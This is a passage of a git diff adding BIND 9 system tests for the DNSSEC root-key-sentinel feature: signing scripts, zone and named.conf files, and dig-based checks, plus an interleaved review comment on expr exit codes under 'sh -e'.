+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=../..
+. $SYSTEMTESTTOP/conf.sh
+
+zone=.
+infile=root.db.in
+zonefile=root.db
+
+keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone $zone)
+keyid=$(expr ${keyname} : 'K.+[0-9][0-9][0-9]+\(.*\)')
+
+(cd ../ns2 && $SHELL sign.sh ${keyid:-00000} )
+
+cp ../ns2/dsset-example$TP .
+
+cat $infile $keyname.key > $zonefile
+
+$SIGNER -P -g -o $zone $zonefile > /dev/null
+
+# Configure the resolving server with a static key.
+keyfile_to_static_ds $keyname > trusted.conf
+cp trusted.conf ../ns2/trusted.conf
+cp trusted.conf ../ns3/trusted.conf
+cp trusted.conf ../ns4/trusted.conf
diff --git a/bin/tests/system/rootkeysentinel/ns2/example.db.in b/bin/tests/system/rootkeysentinel/ns2/example.db.in
new file mode 100644
index 0000000..92ca3bf
--- /dev/null
+++ b/bin/tests/system/rootkeysentinel/ns2/example.db.in
@@ -0,0 +1,21 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 2018031400 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns2
+ns2 A 10.53.0.2
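Review bot: In ns1/sign.sh the assignment `keyid=$(expr ${keyname} : 'K.+[0-9][0-9][0-9]+\(.*\)')` runs under `#!/bin/sh -e`, and expr exits with status 1 when its result is empty or zero (at least GNU expr treats an all-zero string that way), so a generated key whose id is 00000 would abort the script before the `${keyid:-00000}` fallback on the following command is reached. Adding `|| true` inside the substitution, as ns2/sign.sh already does for its arithmetic, avoids that rare setup failure: `keyid=$(expr ${keyname} : 'K.+[0-9][0-9][0-9]+\(.*\)' || true)`. The same gap is in the two zero-padding lines of ns2/sign.sh, `newid=$(expr "0000${newid}" : '.*\(.....\)$')` and the matching `badid` line, which carry no `|| true` and would stop under `-e` whenever the computed id is 0. Quoting `${keyname}` in the expr call would also keep an unexpected KEYGEN output from being split into several arguments.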
diff --git a/bin/tests/system/rootkeysentinel/ns2/named.conf.in b/bin/tests/system/rootkeysentinel/ns2/named.conf.in
new file mode 100644
index 0000000..25e4e50
--- /dev/null
+++ b/bin/tests/system/rootkeysentinel/ns2/named.conf.in
@@ -0,0 +1,32 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.2;
+ notify-source 10.53.0.2;
+ transfer-source 10.53.0.2;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ recursion no;
+ notify yes;
+ dnssec-validation yes;
+};
+
+zone "example" {
+ type primary;
+ file "example.db.signed";
+};
+
+include "trusted.conf";
diff --git a/bin/tests/system/rootkeysentinel/ns2/sign.sh b/bin/tests/system/rootkeysentinel/ns2/sign.sh
new file mode 100644
index 0000000..bae212e
--- /dev/null
+++ b/bin/tests/system/rootkeysentinel/ns2/sign.sh
@@ -0,0 +1,44 @@
+#!/bin/sh -e
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+# leave as expr as expr treats arguments with leading 0's as base 10
+# handle exit code 1 from expr when the result is 0
+oldid=${1:-00000}
+newid=$(expr \( ${oldid} + 1000 \) % 65536 || true)
+newid=$(expr "0000${newid}" : '.*\(.....\)$') # prepend leading 0's
+badid=$(expr \( ${oldid} + 7777 \) % 65536 || true)
+badid=$(expr "0000${badid}" : '.*\(.....\)$') # prepend leading 0's
+
+SYSTEMTESTTOP=../..
+. $SYSTEMTESTTOP/conf.sh
+
+zone=example.
+infile=example.db.in
+zonefile=example.db
+
+keyname1=$($KEYGEN -q -a $DEFAULT_ALGORITHM -b $DEFAULT_BITS -n zone $zone)
+keyname2=$($KEYGEN -q -a $DEFAULT_ALGORITHM -b $DEFAULT_BITS -n zone $zone)
+
+cat $infile $keyname1.key $keyname2.key >$zonefile
+echo root-key-sentinel-is-ta-$oldid A 10.53.0.1 >> $zonefile
+echo root-key-sentinel-not-ta-$oldid A 10.53.0.2 >> $zonefile
+echo root-key-sentinel-is-ta-$newid A 10.53.0.3 >> $zonefile
+echo root-key-sentinel-not-ta-$newid A 10.53.0.4 >> $zonefile
+echo old-is-ta CNAME root-key-sentinel-is-ta-$oldid >> $zonefile
+echo old-not-ta CNAME root-key-sentinel-not-ta-$oldid >> $zonefile
+echo new-is-ta CNAME root-key-sentinel-is-ta-$newid >> $zonefile
+echo new-not-ta CNAME root-key-sentinel-not-ta-$newid >> $zonefile
+echo bad-is-ta CNAME root-key-sentinel-is-ta-$badid >> $zonefile
+echo bad-not-ta CNAME root-key-sentinel-not-ta-$badid >> $zonefile
+
+$SIGNER -P -g -o $zone -k $keyname1 $zonefile $keyname2 > /dev/null
diff --git a/bin/tests/system/rootkeysentinel/ns3/hint.db b/bin/tests/system/rootkeysentinel/ns3/hint.db
new file mode 100644
index 0000000..0018b52
--- /dev/null
+++ b/bin/tests/system/rootkeysentinel/ns3/hint.db
@@ -0,0 +1,13 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+. NS a.root-servers.nil.
+a.root-servers.nil. A 10.53.0.1
diff --git a/bin/tests/system/rootkeysentinel/ns3/named.conf.in b/bin/tests/system/rootkeysentinel/ns3/named.conf.in
new file mode 100644
index 0000000..c9682c9
--- /dev/null
+++ b/bin/tests/system/rootkeysentinel/ns3/named.conf.in
@@ -0,0 +1,33 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.3;
+ notify-source 10.53.0.3;
+ transfer-source 10.53.0.3;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.3; };
+ listen-on-v6 { none; };
+ recursion yes;
+ notify yes;
+ dnssec-validation yes;
+ root-key-sentinel yes;
+};
+
+zone "." {
+ type hint;
+ file "hint.db";
+};
+
+include "trusted.conf";
diff --git a/bin/tests/system/rootkeysentinel/ns4/hint.db b/bin/tests/system/rootkeysentinel/ns4/hint.db
new file mode 100644
index 0000000..0018b52
--- /dev/null
+++ b/bin/tests/system/rootkeysentinel/ns4/hint.db
@@ -0,0 +1,13 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+. NS a.root-servers.nil.
+a.root-servers.nil. A 10.53.0.1
diff --git a/bin/tests/system/rootkeysentinel/ns4/named.conf.in b/bin/tests/system/rootkeysentinel/ns4/named.conf.in
new file mode 100644
index 0000000..6f60ffd
--- /dev/null
+++ b/bin/tests/system/rootkeysentinel/ns4/named.conf.in
@@ -0,0 +1,33 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.4;
+ notify-source 10.53.0.4;
+ transfer-source 10.53.0.4;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.4; };
+ listen-on-v6 { none; };
+ recursion yes;
+ notify yes;
+ dnssec-validation yes;
+ root-key-sentinel no;
+};
+
+zone "." {
+ type hint;
+ file "hint.db";
+};
+
+include "trusted.conf";
diff --git a/bin/tests/system/rootkeysentinel/setup.sh b/bin/tests/system/rootkeysentinel/setup.sh
new file mode 100644
index 0000000..a84f2e7
--- /dev/null
+++ b/bin/tests/system/rootkeysentinel/setup.sh
@@ -0,0 +1,23 @@
+#!/bin/sh -e
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+copy_setports ns1/named.conf.in ns1/named.conf
+copy_setports ns2/named.conf.in ns2/named.conf
+copy_setports ns3/named.conf.in ns3/named.conf
+copy_setports ns4/named.conf.in ns4/named.conf
+
+cd ns1
+$SHELL sign.sh
diff --git a/bin/tests/system/rootkeysentinel/tests.sh b/bin/tests/system/rootkeysentinel/tests.sh
new file mode 100644
index 0000000..c1b43b1
--- /dev/null
+++ b/bin/tests/system/rootkeysentinel/tests.sh
@@ -0,0 +1,296 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +status=0 +n=0 + +rm -f dig.out.* + +DIGOPTS="+tcp +noadd +nosea +nostat +nocmd +dnssec -p ${PORT}" + +newtest() { + n=`expr $n + 1` + case $# in + 1) + echo_i "$1 ($n)" + ;; + 2) + echo_i "$1" + echo_ic "$2 ($n)" + ;; + esac + ret=0 +} + +newtest "get test ids" +$DIG $DIGOPTS . dnskey +short +rrcomm @10.53.0.1 > dig.out.ns1.test$n || ret=1 +oldid=`sed -n 's/.*key id = //p' < dig.out.ns1.test$n` +oldid=`expr "0000${oldid}" : '.*\(.....\)$'` +newid=`expr \( ${oldid} + 1000 \) % 65536` +newid=`expr "0000${newid}" : '.*\(.....\)$'` +badid=`expr \( ${oldid} + 7777 \) % 65536` +badid=`expr "0000${badid}" : '.*\(.....\)$'` +echo_i "test id: oldid=${oldid} (configured)" +echo_i "test id: newid=${newid} (not configured)" +echo_i "test id: badid=${badid}" +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check authoritative server (expect NOERROR)" +$DIG $DIGOPTS @10.53.0.2 example SOA > dig.out.ns2.test$n +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check test zone resolves with 'root-key-sentinel yes;'" " (expect NOERROR)" +$DIG $DIGOPTS @10.53.0.3 example SOA > dig.out.ns3.test$n +grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check root-key-sentinel-is-ta with old ta and" " 'root-key-sentinel yes;' (expect NOERROR)" +$DIG $DIGOPTS @10.53.0.3 
root-key-sentinel-is-ta-${oldid}.example A > dig.out.ns3.test$n || ret=1 +grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check root-key-sentinel-not-ta with old ta and" " 'root-key-sentinel yes;' (expect SERVFAIL)" +$DIG $DIGOPTS @10.53.0.3 root-key-sentinel-not-ta-${oldid}.example A > dig.out.ns3.test$n || ret=1 +grep "status: SERVFAIL" dig.out.ns3.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check root-key-sentinel-not-ta with old ta, CD=1 and" " 'root-key-sentinel yes;' (expect NOERROR)" +$DIG $DIGOPTS @10.53.0.3 +cd root-key-sentinel-not-ta-${oldid}.example A > dig.out.ns3.test$n || ret=1 +grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check root-key-sentinel-is-ta with new ta and" " 'root-key-sentinel yes;' (expect SERVFAIL)" +$DIG $DIGOPTS @10.53.0.3 root-key-sentinel-is-ta-${newid}.example A > dig.out.ns3.test$n || ret=1 +grep "status: SERVFAIL" dig.out.ns3.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check root-key-sentinel-is-ta with new ta, CD=1 and" " 'root-key-sentinel yes;' (expect NOERROR)" +$DIG $DIGOPTS @10.53.0.3 +cd root-key-sentinel-is-ta-${newid}.example A > dig.out.ns3.test$n || ret=1 +grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check root-key-sentinel-not-ta with new ta and" " 'root-key-sentinel yes;' (expect NOERROR)" +$DIG $DIGOPTS @10.53.0.3 root-key-sentinel-not-ta-${newid}.example A > dig.out.ns3.test$n || ret=1 +grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 +if [ 
$ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check root-key-sentinel-is-ta with bad ta and" " 'root-key-sentinel yes;' (expect SERVFAIL)" +$DIG $DIGOPTS @10.53.0.3 root-key-sentinel-is-ta-${badid}.example A > dig.out.ns3.test$n || ret=1 +grep "status: SERVFAIL" dig.out.ns3.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check root-key-sentinel-is-ta with bad ta, CD=1 and" " 'root-key-sentinel yes;' (expect NXDOMAIN)" +$DIG $DIGOPTS @10.53.0.3 +cd root-key-sentinel-is-ta-${badid}.example A > dig.out.ns3.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check root-key-sentinel-not-ta with bad ta and" " 'root-key-sentinel yes;' (expect NXDOMAIN)" +$DIG $DIGOPTS @10.53.0.3 root-key-sentinel-not-ta-${badid}.example A > dig.out.ns3.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check root-key-sentinel-is-ta with out-of-range ta and" " 'root-key-sentinel yes;' (expect NXDOMAIN)" +$DIG $DIGOPTS @10.53.0.3 root-key-sentinel-is-ta-72345.example A > dig.out.ns3.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check root-key-sentinel-not-ta with out-of-range ta and" " 'root-key-sentinel yes;' (expect NXDOMAIN)" +$DIG $DIGOPTS @10.53.0.3 root-key-sentinel-not-ta-72345.example A > dig.out.ns3.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check root-key-sentinel-is-ta with no-zero-pad ta and" " 'root-key-sentinel yes;' (expect NXDOMAIN)" +$DIG $DIGOPTS 
@10.53.0.3 root-key-sentinel-is-ta-1234.example A > dig.out.ns3.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check root-key-sentinel-not-ta with no-zero-pad ta and" " 'root-key-sentinel yes;' (expect NXDOMAIN)" +$DIG $DIGOPTS @10.53.0.3 root-key-sentinel-not-ta-1234.example A > dig.out.ns3.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check CNAME to root-key-sentinel-is-ta with old ta and" " 'root-key-sentinel yes;' (expect NOERROR)" +$DIG $DIGOPTS @10.53.0.3 old-is-ta.example A > dig.out.ns3.test$n || ret=1 +grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 +grep "old-is-ta.*CNAME.root-key-sentinel-is-ta-${oldid}.example." dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check CNAME to root-key-sentinel-not-ta with old ta and" " 'root-key-sentinel yes;' (expect NOERROR)" +$DIG $DIGOPTS @10.53.0.3 old-not-ta.example A > dig.out.ns3.test$n || ret=1 +grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 +grep "old-not-ta.*CNAME.root-key-sentinel-not-ta-${oldid}.example." dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check CNAME to root-key-sentinel-is-ta with new ta and" " 'root-key-sentinel yes;' (expect NOERROR)" +$DIG $DIGOPTS @10.53.0.3 new-is-ta.example A > dig.out.ns3.test$n || ret=1 +grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 +grep "new-is-ta.*CNAME.root-key-sentinel-is-ta-${newid}.example." 
dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check CNAME to root-key-sentinel-not-ta with new ta and" " 'root-key-sentinel yes;' (expect NOERROR)" +$DIG $DIGOPTS @10.53.0.3 new-not-ta.example A > dig.out.ns3.test$n || ret=1 +grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 +grep "new-not-ta.*CNAME.root-key-sentinel-not-ta-${newid}.example." dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check CNAME to root-key-sentinel-is-ta with bad ta and" " 'root-key-sentinel yes;' (expect NXDOMAIN)" +$DIG $DIGOPTS @10.53.0.3 bad-is-ta.example A > dig.out.ns3.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns3.test$n > /dev/null || ret=1 +grep "bad-is-ta.*CNAME.root-key-sentinel-is-ta-${badid}.example" dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check CNAME to root-key-sentinel-not-ta with bad ta and" " 'root-key-sentinel yes;' (expect NXDOMAIN)" +$DIG $DIGOPTS @10.53.0.3 bad-not-ta.example A > dig.out.ns3.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns3.test$n > /dev/null || ret=1 +grep "bad-not-ta.*CNAME.root-key-sentinel-not-ta-${badid}.example." 
dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check test zone resolves with 'root-key-sentinel no;'" " (expect NOERROR)" +$DIG $DIGOPTS @10.53.0.4 example SOA > dig.out.ns4.test$n +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check root-key-sentinel-is-ta with old ta and" " 'root-key-sentinel no;' (expect NOERROR)" +$DIG $DIGOPTS @10.53.0.4 root-key-sentinel-is-ta-${oldid}.example A > dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check root-key-sentinel-not-ta with old ta and" " 'root-key-sentinel no;' (expect NOERROR)" +$DIG $DIGOPTS @10.53.0.4 root-key-sentinel-not-ta-${oldid}.example A > dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check root-key-sentinel-is-ta with new ta and" " 'root-key-sentinel no;' (expect NOERROR)" +$DIG $DIGOPTS @10.53.0.4 root-key-sentinel-is-ta-${newid}.example A > dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check root-key-sentinel-not-ta with new ta and" " 'root-key-sentinel no;' (expect NOERROR)" +$DIG $DIGOPTS @10.53.0.4 root-key-sentinel-not-ta-${newid}.example A > dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check root-key-sentinel-is-ta with bad ta and" " 'root-key-sentinel no;' (expect NXDOMAIN)" +$DIG $DIGOPTS @10.53.0.4 root-key-sentinel-is-ta-${badid}.example A > dig.out.ns4.test$n || ret=1 +grep "status: NXDOMAIN" 
dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check root-key-sentinel-not-ta with bad ta and" " 'root-key-sentinel no;' (expect NXDOMAIN)" +$DIG $DIGOPTS @10.53.0.4 root-key-sentinel-not-ta-${badid}.example A > dig.out.ns4.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check root-key-sentinel-is-ta with out-of-range ta and" " 'root-key-sentinel no;' (expect NXDOMAIN)" +$DIG $DIGOPTS @10.53.0.4 root-key-sentinel-is-ta-72345.example A > dig.out.ns4.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check root-key-sentinel-not-ta with out-of-range ta and" " 'root-key-sentinel no;' (expect NXDOMAIN)" +$DIG $DIGOPTS @10.53.0.4 root-key-sentinel-not-ta-72345.example A > dig.out.ns4.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check root-key-sentinel-is-ta with no-zero-pad ta and" " 'root-key-sentinel no;' (expect NXDOMAIN)" +$DIG $DIGOPTS @10.53.0.4 root-key-sentinel-is-ta-1234.example A > dig.out.ns4.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check root-key-sentinel-not-ta with no-zero-pad ta and" " 'root-key-sentinel no;' (expect NXDOMAIN)" +$DIG $DIGOPTS @10.53.0.4 root-key-sentinel-not-ta-1234.example A > dig.out.ns4.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check CNAME to root-key-sentinel-is-ta with old ta and" " 'root-key-sentinel no;' (expect NOERROR)" +$DIG $DIGOPTS @10.53.0.4 
old-is-ta.example A > dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "old-is-ta.*CNAME.root-key-sentinel-is-ta-${oldid}.example." dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check CNAME to root-key-sentinel-not-ta with old ta and" " 'root-key-sentinel no;' (expect NOERROR)" +$DIG $DIGOPTS @10.53.0.4 old-not-ta.example A > dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "old-not-ta.*CNAME.root-key-sentinel-not-ta-${oldid}.example." dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check CNAME to root-key-sentinel-is-ta with new ta and" " 'root-key-sentinel no;' (expect NOERROR)" +$DIG $DIGOPTS @10.53.0.4 new-is-ta.example A > dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "new-is-ta.*CNAME.root-key-sentinel-is-ta-${newid}.example." dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check CNAME to root-key-sentinel-not-ta with new ta and" " 'root-key-sentinel no;' (expect NOERROR)" +$DIG $DIGOPTS @10.53.0.4 new-not-ta.example A > dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "new-not-ta.*CNAME.root-key-sentinel-not-ta-${newid}.example." 
dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check CNAME to root-key-sentinel-is-ta with bad ta and" " 'root-key-sentinel no;' (expect NXDOMAIN)" +$DIG $DIGOPTS @10.53.0.4 bad-is-ta.example A > dig.out.ns4.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1 +grep "bad-is-ta.*CNAME.root-key-sentinel-is-ta-${badid}.example" dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check CNAME to root-key-sentinel-not-ta with bad ta and" " 'root-key-sentinel no;' (expect NXDOMAIN)" +$DIG $DIGOPTS @10.53.0.4 bad-not-ta.example A > dig.out.ns4.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1 +grep "bad-not-ta.*CNAME.root-key-sentinel-not-ta-${badid}.example." dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/rpz/Makefile.in b/bin/tests/system/rpz/Makefile.in new file mode 100644 index 0000000..bc73907 --- /dev/null +++ b/bin/tests/system/rpz/Makefile.in 
@@ -0,0 +1,48 @@
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+srcdir = @srcdir@
+VPATH = @srcdir@
+top_srcdir = @top_srcdir@
+
+VERSION=@BIND9_VERSION@
+
+@BIND9_MAKE_INCLUDES@
+
+CINCLUDES = ${ISC_INCLUDES} ${DNS_INCLUDES}
+
+CDEFINES =
+CWARNINGS =
+
+ISCLIBS = ../../../../lib/isc/libisc.@A@ @NO_LIBTOOL_ISCLIBS@
+
+ISCDEPLIBS = ../../../../lib/isc/libisc.@A@
+
+DEPLIBS = ${ISCDEPLIBS}
+
+LIBS = ${ISCLIBS} @LIBS@
+
+TARGETS = dnsrps@EXEEXT@
+
+DNSRPSOBJS = dnsrps.@O@
+
+SRCS = dnsrps.c
+
+@BIND9_MAKE_RULES@
+
+all: dnsrps@EXEEXT@
+
+dnsrps@EXEEXT@: ${DNSRPSOBJS} ${DEPLIBS}
+ ${LIBTOOL_MODE_LINK} ${PURIFY} ${CC} ${CFLAGS} ${LDFLAGS} -o $@ ${DNSRPSOBJS} ${LIBS}
+
+clean distclean::
